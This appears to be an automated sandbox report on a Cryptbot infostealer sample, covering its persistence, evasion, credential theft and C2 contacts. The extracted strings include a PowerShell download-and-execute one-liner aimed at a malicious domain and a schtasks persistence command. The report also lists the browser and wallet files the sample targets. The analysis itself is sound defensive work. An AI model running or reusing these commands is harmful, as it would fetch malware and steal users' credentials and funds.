Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: lygbaxpowkdcsgbzdwth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: lygbaxpowkdcsgbzdwth.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 9994752 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c4e00
Source: file.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671200

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00798230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00798230

Source: file.exe	Static PE information: section name: .eh_fram
Source: service123.exe.0.dr	Static PE information: section name: .eh_fram
Source: LYgbAXPoWKdcsgBzdWtH.dll.0.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_0079A521 push es; iretd	5_2_0079A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA80C30 push eax; mov dword ptr [esp], edi	5_2_6CA80DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA4ED10 push eax; mov dword ptr [esp], ebx	5_2_6CA4EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA24E31 push eax; mov dword ptr [esp], ebx	5_2_6CA24E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA18E7A push edx; mov dword ptr [esp], ebx	5_2_6CA18E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1A947 push eax; mov dword ptr [esp], ebx	5_2_6CA1A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA20AA2 push eax; mov dword ptr [esp], ebx	5_2_6CA20AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA38AA0 push eax; mov dword ptr [esp], ebx	5_2_6CA3909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA22AAC push edx; mov dword ptr [esp], ebx	5_2_6CA22AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA4EAB0 push eax; mov dword ptr [esp], ebx	5_2_6CA4EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA52BF0 push eax; mov dword ptr [esp], ebx	5_2_6CA52F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA52BF0 push edx; mov dword ptr [esp], ebx	5_2_6CA52F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1048B push eax; mov dword ptr [esp], ebx	5_2_6CA104A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA104E0 push eax; mov dword ptr [esp], ebx	5_2_6CA106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA18435 push edx; mov dword ptr [esp], ebx	5_2_6CA18449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA38460 push eax; mov dword ptr [esp], ebx	5_2_6CA38A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1A5A7 push eax; mov dword ptr [esp], ebx	5_2_6CA1A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9F1CFA push eax; mov dword ptr [esp], ebx	5_2_6CAA6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9F1CFA push eax; mov dword ptr [esp], ebx	5_2_6CAA6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA106A2 push eax; mov dword ptr [esp], ebx	5_2_6CA106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA286A1 push 890005EAh; ret	5_2_6CA286A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA106A6 push eax; mov dword ptr [esp], ebx	5_2_6CA106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA606B0 push eax; mov dword ptr [esp], ebx	5_2_6CA60A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA166F3 push edx; mov dword ptr [esp], ebx	5_2_6CA16707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA106FD push eax; mov dword ptr [esp], ebx	5_2_6CA106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA52620 push eax; mov dword ptr [esp], ebx	5_2_6CA52954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA52620 push edx; mov dword ptr [esp], ebx	5_2_6CA52973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1070E push eax; mov dword ptr [esp], ebx	5_2_6CA106DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA1A777 push eax; mov dword ptr [esp], ebx	5_2_6CA1A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9EE0D0 push eax; mov dword ptr [esp], ebx	5_2_6CAA6AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6C9EE0D0 push edx; mov dword ptr [esp], edi	5_2_6CAA6B36

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\LYgbAXPoWKdcsgBzdWtH.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-158532

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-158533

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 900

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.2 %

Source: C:\Users\user\Desktop\file.exe TID: 7780	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1636	Thread sleep count: 900 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1636	Thread sleep time: -90000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior

Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: file.exe	Binary or memory string: VMware
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: file.exe, 00000000.00000003.1417427067.0000000001735000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915924666.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915924666.0000000001735000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: file.exe	Binary or memory string: ws.updaterId.jappsrvVMwareEaseUSSignalOneDriveDRPSuPerfLogsNox_shareapp.jsonCacheLocal StateFree_PDF_SolutionsSnapshotsHottaMicrosoftEdgeBackupsobs-studio.xlsWordTeamViewer\TextPredictionPC HelpSoft Driver UpdaterWindows Live.pwdclaveSYACPixelSee LLCdictionariesRainmeterLGHUBCode - Insiders\linkElectronic ArtsProtectMMCJaxxwalletkeyZaloDatawaves-clientGuest Profile.nextNumpad.vscodeadspower_global\cjelfplplebdjjenllpjcblmjkfcffneMultiBitHDavaxmodulesnode_modulesnlbmnnijcnlegkjjpcfjclmcfggfefdm%d x %dProgram FilesOpenOfficeHewlett-Packardafbcbjpbpfadlkmhmclhkeeodmamcflcworkspace-storageHD-PlayerHPPreferencestrxmailSandboxaholpfdialjgjfhomihkjbmgjidlcdno.rtfSlackTegraRcmGUIuser_datapythonProjectForagerOfficeGoogleUpdaterEOS Webcam UtilitystorageEvernoteLlave.jpegExodus EdenUbiquiti UniFiuser_data#2citizenfxfhilaheimglignddkjgofkcbgekhenbhUnrealEngineLauncherwebcacheViberPCBackupblob_storageCachedDatauser_data#3user_data#4bluestacks-servicesCodepassfactorClickUpqmlIK Product ManagerWeModXiaomiSketchUpproductiontupdatesPowerISOcom.liberty.jaxx3D ObjectsWargaming.net%wS (%wS)accountWhatsApp\.jdksLedger Live\integrationsbackupRealNetworksUARhpglfhgfnhbgpjdenjgmdgoeiappaflnCrystal Dynamicsnpm-cacheSamsungSumatraPDFreposCapCut DraftsVisual StudioValve CorporationPicasa2FacebookWebTorrenttastytradebluestacks-services\nodClSmartSteamEmuMetaQuotesCreativeEOS-Webcam-UtilitywebviewCrashReportDBPower BI DesktopCrashRptIntel_CorporationiTop Easy DesktopegjidjbpglichdcondbcbdnbeeppgdphpluginsToolbarookjlbkiijinhpmnjffcofjonbfbgaocActivisionCode CacheRealPlayertwofactordexbhhhlbepdkbapadjdnnojkbgioiodbic.metadataPlay GamesCode\PycharmProjectsLocal StoreBeamNG.drive.thinkorswimSteamWinRAROneNotePrometheanIndexedDBffnbelfdoeiohenkjibnmadjiehjhajbwebview_cache.gitTeamsMeetingAddinkkpllkodjeloidieedojogacfhpaihoh/home/anal/bot/zip_include/miniz.hpArray->m_element_sized->m_huff_code_sizes[0][s_tdefl_len_sym[match_len]]bits <= ((1U << len) - 1U)d->m_huff_code_sizes[1][sym]d->m_huff_code_sizes[0][lit]before create bufferbefore addCryptoWalletsbefore addDatAndEthFilessendingcode < TDEFL_MAX_HUFF_SYMBOLS_2
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_00798230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_00798230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_0079116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_0079116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_00791160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_00791160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007911A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_007911A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007913C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_007913C9

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6CA584D0 cpuid

5_2_6CA584D0

Source: C:\Users\user\Desktop\file.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6c9d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1899287053.000000000434C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 7180, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7680, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: Electrum BTCP
Source: file.exe	String found in binary or memory: \ElectronCash\wallets
Source: file.exe, 00000000.00000002.1915650954.0000000001128000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Opera Software\Opera NextOpera Software\Opera Crypto Stable\@trezor\bitbox\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)atomic\Local Storage\leveldbODISBlizzardsa.edu.ksa.ayatWaves Audiotemp/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$Resp = Invoke-WebRequest -Uri 'https://serviceupdate32.com/update' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr"Unknown %d (Version: )
Source: file.exe	String found in binary or memory: com.liberty.jaxx
Source: file.exe	String found in binary or memory: \Exodus\backup
Source: file.exe	String found in binary or memory: Exodus Eden
Source: file.exe	String found in binary or memory: Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: file.exe PID: 7680, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: file.exe PID: 7680, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	24%	ReversingLabs	Win32.Trojan.Dacic

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sevtvh17pt.top	37.9.4.189	true	true		unknown
198.187.3.20.in-addr.arpa	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
analforeverlovyu.top	true	URL Reputation: safe	unknown
sevtvh17pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	LYgbAXPoWKdcsgBzdWtH.dll.0.dr	false		unknown
https://duckduckgo.com/ac/?q=	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	file.exe	true		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://sevtvh17pt.top/v1/upload.php	file.exe, 00000000.00000003.1417427067.000000000171B000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
37.9.4.189	sevtvh17pt.top	Russian Federation		49505	SELECTELRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1521603
Start date and time:	2024-09-29 01:01:33 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target file.exe, PID 7680 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
01:03:29	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
19:02:37	API Interceptor	3x Sleep call for process: file.exe modified
19:04:01	API Interceptor	601x Sleep call for process: service123.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37.9.4.189	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvh16pt.top/v1/upload.php
37.9.4.189	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	tventyvh20ht.top/v1/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SELECTELRU	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, PrivateLoader, Socks5Systemz	Browse	176.113.115.95
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	84.38.182.221
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	37.9.4.189
